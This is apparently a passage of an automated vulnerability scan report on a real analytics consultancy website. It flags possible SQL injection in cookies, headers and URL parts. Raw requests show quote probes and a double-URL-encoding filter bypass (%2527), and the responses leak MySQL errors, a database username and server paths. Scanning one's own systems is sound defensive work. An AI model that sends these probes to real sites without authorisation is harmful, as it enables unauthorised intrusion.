Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:04:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:04:42 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:04:42 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30094


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.11. http://www.analyticspros.com/blog/55-googleanalytics.html [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:22:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:22:16 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.12. http://www.analyticspros.com/blog/55-googleanalytics.html [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:23:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:23:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:23:41 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:23:41 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28572


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.13. http://www.analyticspros.com/blog/55-googleanalytics/ [apros2.0_tpl cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the apros2.0_tpl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:14:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:14:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.14. http://www.analyticspros.com/blog/55-googleanalytics/ [ki_u cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:17:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:17:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:17:43 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 04:17:43 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28432


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.15. http://www.analyticspros.com/blog/55-googleanalytics/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/?1%2527=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:21:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/?1%2527%2527=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:21:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:21:48 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 04:21:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28549


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.16. http://www.analyticspros.com/blog/55-googleanalytics/ [optimizelyBuckets cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/

Issue detail

The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D'; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:18:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D''; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:18:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:18:32 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 04:18:32 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28432


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.17. http://www.analyticspros.com/blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog%2527/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Component not found
Date: Sat, 06 Nov 2010 06:51:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 06 Nov 2010 06:51:06 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<title>404 - Error: 404</title>
...[SNIP]...

Request 2

GET /blog%2527%2527/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:51:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.18. http://www.analyticspros.com/blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)%2527
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
